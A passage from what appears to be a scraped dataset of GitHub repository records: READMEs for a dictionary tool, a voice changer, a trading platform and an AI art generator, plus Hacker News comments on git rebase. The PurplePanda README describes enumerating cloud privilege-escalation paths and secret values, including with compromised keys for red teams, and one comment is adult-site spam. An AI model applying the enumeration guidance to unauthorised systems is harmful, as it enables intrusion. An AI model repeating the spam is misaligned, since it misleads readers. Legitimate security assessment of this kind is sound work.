fetch words\n* Support custom configuration\n\n## screenshot\n\n![screenshot](http://ww1.sinaimg.cn/large/ded9da26gy1fuchcybxkbg20i70fqnpe.gif)\n\n## look up words\n\nLook up words:\n\n cc {word} @ {dict}\n\nDictionary code:\n\nDictionary | Codename\n--------------------------- | -----------\nSystem built-in Oxford dictionary (requires lxml) | nj, oxford\nLandau Local Dictionary (download required) | ld, landau\nYoudao Online Dictionary | yd, youdao\niciba Online Dictionary | cb, iciba\nBaidu Online Dictionary | bd, baidu\nBing Online Dictionary | by, bing\nHai word online dictionary | hc, dictcn\n\nNote:\n\n* The default keyword is cc (that is, word search), which can be modified through the configuration file.\n* Each dictionary has two long and short codes, the short code is the pinyin abbreviation, which is easy to remember, and the long code is the full name.\n* A switch shortcut can be enabled for each dictionary, `\u2318`/`\u2325`/`\u2303`/`\u21e7`/`fn` + 
`\u21a9`, which can be modified through the configuration file.\n* Landau dictionary is not built in the system, please [download](http://pan.baidu.com/s/1qWx4mV6) first, and then copy it to `~/Library/Dictionaries/` directory.\n* Since Bing and Haici do not provide APIs, they can only be obtained by parsing HTML, so the speed may be slightly slower (optimized).\n\n## Internal commands\n\nView internal commands:\n\n cc:\n\ncommand | function\n------- | ---------------------------------\nclean | clear all caches\nconfig | edit configuration file (json format)\nupdate | After modifying some items in the configuration file, it needs to be updated to take effect\n\nIt is recommended to execute an update every time the configuration file is modified to ensure it takes effect.\n\n## configuration file\n\nThe configuration file is in json format and currently has the following options:\n\n* \"keyword\": keyword, default is \"cc\".\n* \"default\": The default dictionary, which is the dictionary used when `@{dict}` is omitted, defaults to \"nj\".\n* \"keymap\": key binding, modify shortcut keys for switching dictionaries, support the following modifier keys:\n * \"none\": Behavior when pressing Enter directly, can be \"open\" or \"say\":\n - \"open\": Open the detailed explanation page (browser or system dictionary).\n - \"say\": Pronunciation, currently only supports the system tts engine.\n * \"ctrl/alt/shift/cmd/fn\": Dictionary code, long or short.\n* \"options\": Dictionary-related options, generally do not need to be modified.\n * \"dictcn\": sea words dictionary options:\n * \"wap_page\": Whether to use the wap page to look up words, the wap page has less information, the default is \"false\".\n* \"cache\": Cache related settings.\n * \"enable\": Enable or disable caching, default is \"true\".\n * \"expire\": cache expiration time, in hours, default is \"24\".\n\nNote:\n\n* There are also more detailed English comments in the configuration file, please be sure to understand the function of each option before modifying.\n* \"keyword\" and \"keymap\" After these two options are modified, execute update to take effect.\n* There is no special requirement, no need to modify the configuration file, just keep the default.\n\n## LICENSE\n\nGPL", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "symphonly/figaro", "link": "https://github.com/symphonly/figaro", "tags": ["voice", "voice-chat", "voice-changer", "discord", "python", "pyaudio", "figaro", "teamspeak", "voice-filters", "virtual", "microphone", "audio", "sound", "roadmap", "cli", "sound-effects"], "stars": 512, "description": "Real-time voice-changer for voice-chat, etc. Will support many different voice-filters and features in the future. \ud83c\udfb5", "lang": "Python", "repo_lang": "", "readme": "

# Figaro
\n\n---\n\n## About\n\nReal-time open-source voice modification program & sound board. Can be useful for many things, especially when used in combination with virtual sound i/o devices.\n\n![figaro collage](media/figaro-collage.png)\n\n![figaro demo](media/figaro-demo.gif)\n\n## Table of Contents\n\n- [About](#about)\n- [Table of Contents](#table-of-contents)\n- [Setup](#setup)\n - [Development](#development)\n - [Linux](#linux)\n - [Mac](#mac)\n - [Windows](#windows)\n - [Manual Setup](#manual-setup)\n - [Advanced setup](#advanced-setup)\n- [Usage](#usage)\n - [CLI](#cli)\n - [GUI](#gui)\n - [Figaro-Script](#figaro-script)\n - [General Syntax](#general-syntax)\n - [Defining a Hotkey](#defining-a-hotkey)\n - [Comments](#comments)\n - [Builtins](#builtins)\n - [Pause](#pause)\n- [Roadmap](#roadmap)\n- [References](#references)\n\n## Setup\n\nIf you're just looking to use *Figaro* and not work on it, then there's no reason to set up the development environment like described below, simply download the appropriate release for your platform from the [releases](https://github.com/MattMoony/figaro/releases) page and you're good to go!\n\n
\n\n### Development\n\nIf you're on `Linux`, `Windows` or `Mac`, then setting up should be easy! Simply run the appropriate setup script and it will guide you through the whole process.\n\n#### Linux\n\nMake `./setup.sh` executable ... (or run it with an appropriate interpreter) ...\n\n```bash\nchmod 755 ./setup.sh\n```\n\n... execute it: `./setup.sh` ... and have fun with `python figaro.py`!\n\n#### Mac\n\nThe same as the [Linux Setup](#linux), just use `./setup-mac.sh` instead of `./setup.sh`.\n\n#### Windows\n\nFirst, in order to allow the setup _powershell_ script to run, you need to execute the following command in an administrator powershell:\n\n```ps\nSet-ExecutionPolicy RemoteSigned\n```\n\n... afterwards, executing `.\\setup.ps1` will guide you through the whole setup process! You can now execute `python figaro.py`.\n\n#### Manual Setup\n\nFirst of all, for `Figaro` to be able to work with audio files other than `wav`, you need to download and install `ffmpeg` (see [References](#References) for the link to the official download page).\n\n- **Linux**: `pip install -r requirements-unix.txt`\n- **Mac**: `pip install -r requirements-unix.txt`\n- **Windows**: `pip install -r requirements-windows.txt`\n\n... if you're on **Windows** and you get an error when installing `PyAudio` try downloading a PIP wheel suitable for your Python version from the link provided in [References](#References).\n\nIf everything works out, you're good to go!\n\n### Advanced setup\n\nThe following steps will explain how to use this program with the commonly used voice-chat application `Discord` on Windows:\n\n1. Download and install a virtual audio input device (if you don't know any specific one, try the one mentioned in [References](#References)).\n2. When selecting an output device at the startup of `Figaro`, choose the virtual input device you just installed (e.g.: `CABLE Input`).\n3. In Discord, go to `User Settings > Voice & Video > Input Device` and select the virtual input device from the dropdown (e.g.: `CABLE Output`).\n4. There you go, your friends should only be able to hear your filtered voice now.\n\n## Usage\n\n### CLI\n\nCLI-Usage is explained [here](docs/cli.md).\n\n### GUI\n\nGUI-Usage is explained [here](docs/gui.md).\n\n### Figaro-Script\n\nYou can now also use figaro script (.fig) for defining hotkeys and their behaviour. Whether you want a sound effect to be played, or an attribute to be shown, it can all be bound to a certain keypress.\n\n#### General Syntax\n\nFigaro-Script was heavily inspired by [AutoHotkey](https://www.autohotkey.com/), so, if you are capable of defining hotkeys and their functionality with ahk-script, think of this as a very, very simplified version of that.\n\nBut, if you aren't aware of ahk, let me introduce you to the basic syntax very quickly:\n\nYour script, the .fig file, consists of multiple hotkey-definition blocks which tell Figaro which key combinations should result in what behaviour. Apart from that, you can also have comments, to make your script more readable and easier to understand for a future you.\n\n#### Defining a Hotkey\n\nIn order to define which keys make up your hotkey, you just need to write all of them in one line and end it with `::`. After this first line, you write all your commands and end the definition block with `return`. This could look something like the following:\n\n```text\n...\n\nq::\nstart sound tmp/asdf.mp3 2\nreturn\n\n...\n```\n\n... 
this hotkey would be triggered every time the `q` is pressed.\n\nCertain control keys need alternative symbols (this is equalivalent to ahk-script):\n\n* `alt` is represented by `!`\n* `ctrl` is represented by `^`\n* `shift` is represented by `+`\n\n... keep in mind that the definition of hotkeys is usually case insensitive, which means in order to, for example, only trigger the hotkey on an uppercase `Q`, you would need to use `+q::` as your definition.\n\n#### Comments\n\nThis is fairly easy to explain. If you have ever used a popular programming language such as C, C++, Java, etc. you already know how to use comments. The only thing to bear in mind is that so far, I have only implemented `single-line` comments.\n\nFor people who have never used such a programming language before, this is the correct syntax for comments in Figaro-Script:\n\n```text\n...\n\n// triggered by pressing `lower-case q`\n// will play the mp3 file \"tmp/asdf.mp3\" at 200% of the original volume ...\nq::\nstart sound tmp/asdf.mp3 2\nreturn\n\n...\n```\n\n#### Builtins\n\nDespite the CLI commands, certain builtin functions are also available to you (at the moment there aren't many, but I will at more should the need to do so arise):\n\n##### Pause\n\nYou can use this command in order play a sound effect, or do anything else for that matter, after waiting for a given amount of `milliseconds`. E.g.:\n\n```text\n...\nstart sound tmp/1.mp3\npause 3000\nstart sound tmp/2.mp3\n...\n```\n\n... this would play the sound effect `tmp/1.mp3`, wait for `3 seconds` and then play the next sound effect `tmp/2.mp3`.\n\n_More docs coming soon! Disclaimer: Some of the commands described above might still be removed or altered..._\n\n## Roadmap\n\nJust a small preview of what is about to come. It's very likely that this roadmap will continue to grow in the future, as I get more ideas or if somebody wants to contribute.\n\n* [x] [CLI](#cli)\n * [x] I/O device selection\n * [x] Live status (live audio graph in console)\n * [x] Filter control\n * [x] Sound effects (soundboard-like abilities)\n* [ ] [GUI](#gui)\n * [x] I/O device selection\n * [x] Live sound wave graph\n * [x] Filter control\n * [ ] Soundboard\n * [x] Functionality\n * [ ] Advanced features\n* [x] Filters\n * [x] Volume\n * [x] Pitch-Shift\n * [x] \"Trippy\"-Filter\n * [x] Echo\n * [x] Noise\n * [x] Crackle\n * [x] Randomized\n* [ ] [Figaro-Script](#figaro-script)\n * [x] Using CLI commands\n * [x] Hotkeys\n * [ ] Advanced builtins\n* [ ] Security\n * [x] Remote Authentication\n * [x] Encrypted sockets\n * [ ] Fine-grained settings\n\n## References\n\n* Windows Virtual Sound I/O ... [vb-audio](https://www.vb-audio.com/Cable/)\n* PyAudio Windows Wheel ... [uci](https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyaudio)\n* FFmpeg download ... [ffmpeg.org](https://ffmpeg.org/download.html)\n* JWT minimum secret length ... [RFC 7518](https://tools.ietf.org/html/rfc7518#section-3.2)\n* JWT recommended secret length ... [Auth0](https://auth0.com/blog/brute-forcing-hs256-is-possible-the-importance-of-using-strong-keys-to-sign-jwts/)\n\n---\n\n... 
MattMoony (June 2021)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "carlospolop/PurplePanda", "link": "https://github.com/carlospolop/PurplePanda", "tags": ["cloud", "privesc", "gcp", "github", "kubernetes"], "stars": 512, "description": "Identify privilege escalation paths within and across different clouds", "lang": "Python", "repo_lang": "", "readme": "# PurplePanda\n![](https://github.com/carlospolop/PurplePanda/raw/master/images/logo.png)\n\nThis tool fetches resources from different cloud/saas applications focusing on permissions in order to **identify privilege escalation paths and dangerous permissions** in the cloud/saas configurations. Note that PurplePanda searches both **privileges escalation paths within a platform and across platforms**.\n\nThe name comes from the animal **Red Panda**. This panda eats peas, just like Purple Panda, which can ingest API keys/tokens found by these **[PEASS](https://github.com/carlospolop/PEASS-ng)**. The color was changed to purple because this tool is meant mainly for **Purple Teams** (because it can be **highly useful for both Blue and Red Teams**).\n\n## How to use\nEach folder inside `/intel` defines one platform that can be enumerated and **contains a README.md file explaining how to use that specific module**.\n\nDownload **[Neo4jDesktop](https://neo4j.com/download-center/#desktop)** and create a database. Then **export the env variables `PURPLEPANDA_NEO4J_URL` and `PURPLEPANDA_PWD`** with the URL to the neo4j database and the password.\n\nIf you want **shodan** to be used with public IPs discovered during the enumeration **export a env variable called *SHODAN_KEY* with a valid api key of shodan**.\n\nThen just install and launch the program indicating the platforms you want to enumerate comma separated like.\n\n### Local install\n```bash\ngit clone https://github.com/carlospolop/PurplePanda\ncd PurplePanda\npython3 -m venv .\nsource bin/activate\npython3 -m pip install -r requirements.txt\nexport PURPLEPANDA_NEO4J_URL=\"bolt://neo4j@localhost:7687\"\nexport PURPLEPANDA_PWD=\"neo4j_pwd_4_purplepanda\"\npython3 main.py -h # Get help\npython3 main.py -e -p google,github,k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values # Enumerate google, github and k8s\n```\n\n### Docker\n```bash\n# Consider adding the API keys in the Dockerfile\ndocker rm -f purplepanda\ndocker build --tag=purplepanda .\n# Execute -h\n## CHange -h for the params you want to run purplepanda with\ndocker run -t \\\n -e PURPLEPANDA_NEO4J_URL=\"bolt://neo4j@host.docker.internal:7687\" \\\n -e PURPLEPANDA_PWD=\"s3cr3t\" \\\n -e GOOGLE_DISCOVERY=... \\\n -e GITHUB_DISCOVERY=... \\\n -e K8S_DISCOVERY=... \\\n -e CONCOURSE_DISCOVERY=... \\\n -e CIRCLECI_DISCOVERY=... 
\\\n purplepanda python3 main.py -h\n\n## -t is needed to see the output properly\n## If you are using Neo4Desktop to connec to the DB use the domain host.docker.internal\n## You might need to use the option '-v' to mount files with configurations\n```\n\nPurplePanda has **2 analysis modes**:\n- `-e` (*enumerate*): This is the **main one**, it will try to gather data and analyze it.\n- `-a` (*analyze*): This will perform a **quick analysis of the provided credentials**.\n\n### Video tutorial\nCheck how to use and inspect the data gathered by PurplePanda:\n\n[![Tutorial](https://img.youtube.com/vi/zl5NdvoWHX4/0.jpg)](https://www.youtube.com/watch?v=zl5NdvoWHX4)\n\n### For Blue/Purple Teams\n\nUse credentials for each platform with at least **admin read access to all the resources** of the platform. This will help you to see exactly the **privesc paths** that can be abused within your configurations in each platform and across\n\n### For Red Teams\n\nPurplePanda is also **designed to be used by Red Teams**. In general, cloud/saas platforms **won't give everyone access to read** the configuration of the platform, that's why PurplePanda supports the **use of several keys for the same platform**, in order to try to enumerate everything with all the keys you compromised and have the most accurate view of the configuration of the platform.\n\n## Supported platforms\n- **Google Cloud Platform (GCP)**: To understand how GCP security works and how to abuse roles and permissions **read https://book.hacktricks.xyz/cloud-security/gcp-security**\n- **Github**: To understand how Github security works and how to bypass branch protections, steal secrets, privesc... **read https://book.hacktricks.xyz/cloud-security/github-security**\n- **Kubernetes (K8s)**: To understand how Kubernetes RBAC security works and how to abuse roles, privesc to other clouds... **read https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes**\n\n\n## How to use the data\n**Use the `-d` parameter** indicating a directory. Then, **PurplePanda will write in this directory several interesting analysis** in `csv` format of the information obtained from all the platforms. The recommendation is to **find interesting and unexpected things in those files** and then move to **analyze those interesting cases with the graphs**.\n\nEach folder inside `/intel` defines one platform that can be enumerated and **contains a README.md file explaining how to use that specific module**. Moreover, each folder also contains a `HOW_TO_USE.md` file and a `QUERIES.md` file. \n\nIn the `HOW_TO_USE.md` file you can find the **best queries to perform an investigation on how to escalate privileges** (*for Purple, Blue, and Red Teams*).\n\nIn the `QUERIES.md` file you will find **all proposed queries** to investigate the data easier.\n\n### How to visualize the data in graphs\nFollow the instructions indicated in **[VISUALIZE_GRAPHS.md](https://github.com/carlospolop/PurplePanda/blob/master/VISUALIZE_GRAPHS.md)**\n\n## How to Contribute\n\nIn the **root folder and in each folder inside `intel/`** you will find a **`TODO.md` file**. You can find in those files how you can help. 
Just **send a PR with the addition**.\n\n**PRs with fixes** are also welcome :)\n\nMoreover, if you have **other ideas** that aren't in those TODO files feel free to send a PR.\n\n\nBy Carlos PolopTM\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Febase/FeBase", "link": "https://github.com/Febase/FeBase", "tags": [], "stars": 512, "description": "FeBase \uc640 \ud568\uaed8\ud558\ub294 Frontend \ud558\ub098\uc529 \ubc30\uc6cc\uac00\uba74 \ub298\uc5b4\ub098\ub294 CS\uc9c0\uc2dd \uc624\ud018\uc774!", "lang": "Python", "repo_lang": "", "readme": "import pathlib\nfrom lib.header import Header\nfrom lib.rmd import Rmd\n# from lib.logger import Logger\n# from lib.gitlog import Gitlog\n\nroot_path = pathlib.Path(__file__).parent.resolve()\n\n\ndef start_update():\n md_paths = root_path.glob('*/*.md')\n # gitlog = Gitlog(root_path)\n toc_data = {}\n for file_path in md_paths:\n fp = file_path.open()\n header = Header(fp)\n header.set_header(['title', 'author', 'date', 'category'])\n header_data = header.get_header()\n path = str(file_path.relative_to(root_path))\n url = \"https://github.com/Febase/FeBase/blob/master/{}\".format(path)\n category = header_data['category'].upper()\n item = {\n \"path\": path,\n \"url\": url,\n \"header\": header_data\n }\n if category in toc_data:\n toc_data[category].append(item)\n else:\n toc_data[category] = [item]\n # logger.update(header_data, url, path)\n # gitlog.check_status()\n # logger.save(log_path)\n return toc_data\n\n\ndef rewrite_readme(toc_data):\n readme = root_path / 'README.md'\n rmd = Rmd(readme)\n rmd.update_toc(toc_data)\n rmd.rewrite()\n\n\nif __name__ == \"__main__\":\n # log_path = root_path / '.log/readme_log.json'\n # logger = Logger()\n # logger.load(log_path)\n toc_data = start_update()\n rewrite_readme(toc_data)\n", "readme_type": "text", "hn_comments": "No idea how git rebase, productivity, and layoffs could be related at all. Curious, though.It\u2019s a metric of people looking to improve at git. So maybe either an indication more people are looking to get into the field, or that people are looking to improve their productivity. Or maybe it\u2019s part of some cert people are after.Hello everyone, I have some wise advice that will help you if you want to unwind and have a nice time. For instance, https://grantubodesexo.com/ is perfect for a night out because it allows you to let off steam while having fun. I think you should have a look.\"Within a converged timeline there are two timelines of events, so to create a new non-converged timeline you have to go back to the point in time where those timelines converged and add every event in the converged timelines in order in the new timeline.If things don't really work and a conflict emerges you, as the master of time, have to decide the right data to put into the new timeline\"Hope it helps you breathe more easily :)I'm the opposite and think rebasing is easier, but I am biased obviously since I have only used rebasing to solve merge conflicts.There are a couple ways of performing a git rebase, namely* git rebase* git rebase interactive (git rebase -i)* git rebase --ontoI think following these videos may help and will explain it better than I can.What is Git Rebase? [Intermediate Git Tutorial] - https://www.youtube.com/watch?v=_UZEXUrj-DsSquashing Git commits with Interactive Rebase -https://www.youtube.com/watch?v=7IfkL8swmFwHow to undo git rebase using git reflog. 
- https://www.youtube.com/watch?v=qP4i3S2hujc&t=203sIt's not. Just spend some time thinking about it not as a command to execute, but rather as an operation on a data structure you're working with (which is your repository) and it will click.Git is a good idea with a poor execution and namingGit appears to be a tool to manage merges using deltas. Git is actually a tool that simply stores everything in the current commit, and makes a nice graph showing Connections between those commits which theoretically represent deltas.All trouble arises when this abstraction breaks. It seems to me that the purpose of git merge is to simply allow you to work around broken abstractions. You can make the graph appear how you want, without having to jump through a bazillion unnecessary hoops to make a nice set of deltas.Or... I'm wrong and about to find out after hitting \"add comment\"Everything Git is kind of hard to understand, but once it \"clicks\", you kinda start thinking it was easy all along.My suggestion is: before every rebase:- mkdir patches- cd patches- git format-patch HEAD~30 (in case you had 30 commits on top of the main branch but you can also \"git format-patch $SHA\" to get patches up to that SHA, not including)- git pull --rebaseThen, if the rebase fails:- git checkout -b branchname-rebaseattempt origin/branch- make- git am 0001*- make- git am 0002*- git am --abort- etcThis way you have a backup copy of every one of your commits as a patch file, and you can better understand and fix your conflict step-by-step without being \"locked\" in the process of a git-rebase. Sometimes when there are simple conflicts I edit the patch files themselves before applying.How the hell is it mysterious? It is just cherry-picking the commits then setting the branch pointer. Merge is the evil one because you can hide any changes you like in the commit.I was waiting for \u201eGitlab releases a UI for rebase -i in MRs\u201c.Years ago I really liked rebase, now I never use it. I don't know why, though, one of those mysteries of the brain.Been using git for 10 years now, never rebased, never had an issue.Rebase has become so integral to my workflow, it's hard to imagine living without it. I intentionally avoid merge commits, including configuring git pull to rebase rather than merge. I find it so much easier to commit a bunch of tiny iterations while doing local testing, rebase and squash them, then post them for review. As a bonus, I frequently push after each of those small commits to a feature branch so I don't have to worry about losing work if my drive dies.Easily the most underutilized and poorly understood part of the typical git workflowI don't know if Christian would go this far, but I actually put this into my ~/.gitconfig so that I'm always rebasing[pull]rebase = trueedited for line spacingIn my personal experience rebase made ISO9000/AS9000 gatekeepers twitchy. Even to the extent that they'd tell the Overlords \"Do everything in Perforce, or else\".And then the Overlords shut down all the VCSs because \"this isn't a software company\". Then everyone sneaks around using weird homebrew portable tracking widgets, or, more often, just gives up.Is rebase handy? Oh yeah.I love rebase. It allows for a Draft PR workflow where you can have your WIP out in the open for a big project, and then clean it all up via rebasing right before asking for reviews. Just don't rewrite history on master. :^)Every PR we have in GitHub is merged with a squash, so I'm kinda missing the value proposition here. 
Is it really crucial for each commit to be a nice clean unit of work?Git is in general a terrible tool: I\u2019ve always thought of it as a shining example of where \u201cworse is better\u201d ought to have been applied. Rebasing is one of its worst features. For non-trivial changes, anyway, it is often just a way to add complexity and messiness to what should be a simple workflow. And the benefits aren\u2019t at all as clear as its advocates contend.If I've already reviewed a PR and the author makes further changes, I definitely prefer to review an add-on commit. If the history is rewritten/rebased, then IME the entire PR needs to be re-reviewed from scratch. If we're talking about a <10 line change, then, by all means, rebase to your heart's content. With anything more complicated than that, rebasing a branch that's already been looked at can be disruptive and I'd strongly recommend against it (though squash-and-merge after review is fantastic).The one thing I'd like to do is to insert a commit between two commits, then edit this and then make a modification.Currently I create a text file, add this, then move this up to where I need to insert it and edit this commit.Keeping your commits as separate units of change, and leveraging rebase/ff-only is worth is simply so you can do stuff like the following. git revert $(git rev-list COMMIT43^..COMMIT123 -- path/to/thing)\n\nI've been on teams where everyone _hates_ what a stickler I am about good VCS hygiene until they realize something that looks like it's going to be a big pain in the ass at first glance is doable with a one liner.I sometimes run into rebases where solving merge conflicts 3 times is hard. Replaying 3 commits for instance, where merge conflicts are present in each one. In the first I need to fix the merge conflict but remind myself that there are more commits following this that change this behavior.With a merge commit I am fixing the resulting work on both branches, which is easier than merging the in progress state in the current branch.Love rebasing, love merging, squash or no squash, it all depends on what I'm trying to communicate with my pushes.Just discovered the --rebase-merges option, worth exploring if you want to edit a commit under a merge commit, but don't want to mess up the merge commits.The following tip from OP could be rather useful. git rebase --exec 'make test' main\n\nThe --exec flag allows you to run any shell command after each rebased commit, stopping if the shell command fails (which is signaled by a non zero exit code).I don't know if it's possible to write an article like this and not just be preaching to the choir; ignored by the flock that's already decided it doesn't like it.Rebasing is merging multiple commits to one commit right? Basically you commit your small changes to your local master branch and at some point you merge them to one commit and push them to master repo?No rebase tutorial is complete without the --onto option, which lets you essentially transplant a series of commits to a completely different branch.Very useful when you've created a branch(A) based on another branch(B), which in turn was based on master, but in the meantime master had a few commits added, so while it's trivial to rebase B with master, rebasing A with an updated B won't work.Rules I would have everyone follow if I was a dictator:1. 1 PR, 1 commit.2. 1 PR cannot have more than 50 lines of product code added. Any number of lines can be removed. You can have up to 100 lines of test code.3. 
Every PR should include a set of tests for the added/changed functionality. They must pass.4. Git merge is forbidden. Everyone must rebase.5. Every PR goes into master. Nobody can push to master. You can create as many feature branches you like, but definition of done is that your code is available on master.6. Identify relevant existing test cases and make sure they are passing.7. Master must always be in a state that it can be deployed instantly.A lot of people have hate for rebase, but I've always LOVED it. I've always had way less issues with it than merge. Whenever I do a feature I work in a feature branch then just rebase it with the target branch (main) before submitting the PR and it is a really painless workflow I've used for years.On Mac, I prefer Gitup, a free and open source GUI which makes rebases (and a bunch of other git operations) much easier: https://github.com/git-up/GitUpA much more in-depth, advanced, and more valuable imo, article on the same topic https://medium.com/@porteneuve/getting-solid-at-git-rebase-v...irony is that my team use gitlab and we have auto squash before merge, avoiding manual rebasingI would recommend not doing anything complicated such as git rebase and just add more commits, patches (git diff / apply), or merges until your code works. If the number of commits is large, it doesn\u2019t really matter. Optimizing for a pretty looking git history is probably the most foolish thing to focus on.If you are doing anything that involves rewriting the history you are doing it wrong.Rebase is something that I see a lot of developers shy away from but it is usually the right way to get a feature branch re-aligned.My practice is to rebase all my pending PRs each morning to make sure that the prior day's activity is coalesced.If you wait weeks and weeks to do the first rebase for a big change set, you can wind up visiting the same files and conflicts way more times than is logical. In my experience, this results in a much greater chance of screwing something up along the way, further reinforcing for some developers that the rebase is bad.Timely rebase is the answer.--fixup has been incredibly useful for my rebase workflows.Anyone who has experienced rebasing a PR on github knows how much it hurts the review process.Thanks for posting! We just adopted rebase for our docs repo, so this was a timely article for me. I do really like the clean commit history, but I also haven't experienced any of the downsides yet.I think squash is what most workflows and teams actually want. Rebase doesn\u2019t scale well with the team size and merge makes rollbacks somewhat unwieldy and history messy.I say just merge it in and stop worrying about it so much.Squash + Merge is better for the vast majority of developers who put garbage commit messages in their feature branches.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kieran-mackle/AutoTrader", "link": "https://github.com/kieran-mackle/AutoTrader", "tags": ["algorithmic-trading", "algo-trading", "forex", "crypto", "stocks", "finance", "investing", "trading", "trading-strategies", "trading-bot", "trading-platform", "oanda", "trading-algorithms", "python", "quantitative-finance", "quantitative-trading", "technical-analysis", "autotrader"], "stars": 512, "description": "A Python-based development platform for automated trading systems - from backtesting to optimisation to livetrading. ", "lang": "Python", "repo_lang": "", "readme": "

# AutoTrader
\n\n\n\nAutoTrader is Python-based platform intended to help in the development, optimisation and deployment of automated trading systems. \nA basic level of experience with Python is recommended for using AutoTrader, but the [docs](https://autotrader.readthedocs.io/en/latest/) \naim to make using it as easy as possible with detailed tutorials and documentation.\n\n## Latest News\n- Version 0.7 has been released, adding integrations with [CCXT](https://github.com/ccxt/ccxt) and [dYdX](https://dydx.exchange/) crypto exchanges. Many more powerful upgrades too.\n- AutoTrader has been featured in GitClone's recent article, [*Top Crypto Trader Open-Source Projects on Github*](https://gitclone.dev/top-crypto-trader-open-source-projects-on-github/).\n\n## Features\n- A feature-rich trading simulator, supporting [backtesting](https://autotrader.readthedocs.io/en/latest/features/backtesting.html) and \npapertrading. The 'virtual broker' allows you to test your strategies in a risk-free, simulated environment before going live. Capable \nof simulating multiple order types, stop-losses and take-profits, cross-exchange arbitrage and portfolio strategies, AutoTrader has \nmore than enough to build a profitable trading system.\n- [Integrated data feeds](https://kieran-mackle.github.io/AutoTrader/tutorials/price-data), making OHLC data retrieval as easy as possible.\n- [Automated interactive visualisation](https://autotrader.readthedocs.io/en/latest/features/visualisation.html) using [Bokeh](https://bokeh.org/)\n- [Library of custom indicators](https://autotrader.readthedocs.io/en/latest/indicators.html).\n- [Live trading](https://autotrader.readthedocs.io/en/latest/features/live-trading.html) supported for multiple venues.\n- [Detailed documenation and tutorials](https://autotrader.readthedocs.io/en/latest/index.html)\n- [Repository](https://github.com/kieran-mackle/autotrader-demo) of example strategies\n\n## Supported Brokers and Exchanges\n\n| Broker | Asset classes | Integration status |\n| -------- | ------------- | ------------------ |\n| [Oanda](https://www.oanda.com/) | Forex CFDs | Complete |\n| [Interactive Brokers](https://www.interactivebrokers.com/en/home.php) | Many | In progress |\n| [dYdX](https://dydx.exchange/) | Cryptocurrencies | Complete |\n| [CCXT](https://github.com/ccxt/ccxt) | Cryptocurrencies | In progress |\n\n\n## Installation\nAutoTrader can be installed using pip:\n```\npip install autotrader\n```\n### Updating\nAutoTrader can be updated by appending the `--upgrade` flag to the install command:\n```\npip install autotrader --upgrade\n```\n\n## Documentation\nAutoTrader is very well documented in-code and on [Read the Docs](https://autotrader.readthedocs.io/en/latest/). There is also a [detailed walthrough](https://autotrader.readthedocs.io/en/latest/tutorials/walkthrough.html), covering everything from strategy concept to livetrading.\n\n### Example Strategies\nExample strategies can be found in the [demo repository](https://github.com/kieran-mackle/autotrader-demo).\n\n\n## Backtest Demo\nThe chart below is produced by a backtest of the MACD trend strategy documented in the \n[tutorials](https://autotrader.readthedocs.io/en/latest/tutorials/building-strategy.html) (and available in the \n[demo repository](https://github.com/kieran-mackle/autotrader-demo)). Entry signals are defined by MACD crossovers, with exit targets defined\nby a 1.5 risk-to-reward ratio. 
Stop-losses are automatically placed using the custom\n[swing detection](https://autotrader.readthedocs.io/en/latest/indicators.html#swing-detection) indicator, and position sizes are dynamically calculated based \non risk percentages defined in the strategy configuration.\n\nRunning this strategy with AutoTrader in backtest mode will produce the following interactive chart. \n\n[![MACD-backtest-demo](https://user-images.githubusercontent.com/60687606/128127659-bf81fdd2-c246-4cd1-b86d-ef624cac50a7.png)](https://autotrader.readthedocs.io/en/latest/tutorials/backtesting.html#interactive-chart)\n\nNote that stop loss and take profit levels are shown for each trade taken. This allows you to see how effective your exit strategy is - are you being stopped out too \nearly by placing your stop losses too tight? Are you missing out on otherwise profitable trades becuase your take profits are too far away? AutoTrader helps you \nvisualise your strategy and answer these questions.\n\n## Legal \n### License\nAutoTrader is licensed under the [GNU General Public License v3.0](https://www.gnu.org/licenses/gpl-3.0.en.html).\n\n### Disclaimer\nThis platform is currently under heavy development and should not be considered stable for livetrading until version 1.0.0 is released.\n\nNever risk money you cannot afford to lose. Always test your strategies on a paper trading account before taking it live.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rbbrdckybk/ai-art-generator", "link": "https://github.com/rbbrdckybk/ai-art-generator", "tags": ["machine-learning", "vqgan-clip", "deep-learning", "image-generation", "clip-guided-diffusion", "generative-art", "stable-diffusion"], "stars": 512, "description": "For automating the creation of large batches of AI-generated artwork locally.", "lang": "Python", "repo_lang": "", "readme": "# 2022-09-28 Update:\nJust a note that I've launched [Dream Factory](https://github.com/rbbrdckybk/dream-factory), a significant upgrade to this. It's got an (optional) GUI, true simultaneous multi-GPU support, an integrated gallery with full EXIF metadata support, and many other new [features](https://github.com/rbbrdckybk/dream-factory#features). \n\nI dropped VQGAN and Disco Diffusion support to focus on Stable Diffusion, so if you want VQGAN and/or Disco Diffusion you should stick with this for now. Otherwise I encourage everyone to migrate to Dream Factory! I'll continue to patch bug fixes on this repo but I likely won't be adding new features going foward.\n\n# AI Art Generator\nFor automating the creation of large batches of AI-generated artwork locally. Put your GPU(s) to work cranking out AI-generated artwork 24/7 with the ability to automate large prompt queues combining user-selected subjects, styles/artists, and more! More info on which models are available after the sample pics. \nSome example images that I've created via this process (these are cherry-picked and sharpened): \n\"sample\n\"sample\n\"sample\n\"sample\n\"sample\n\"sample \nNote that I did not create or train the models used in this project, nor was I involved in the original coding. 
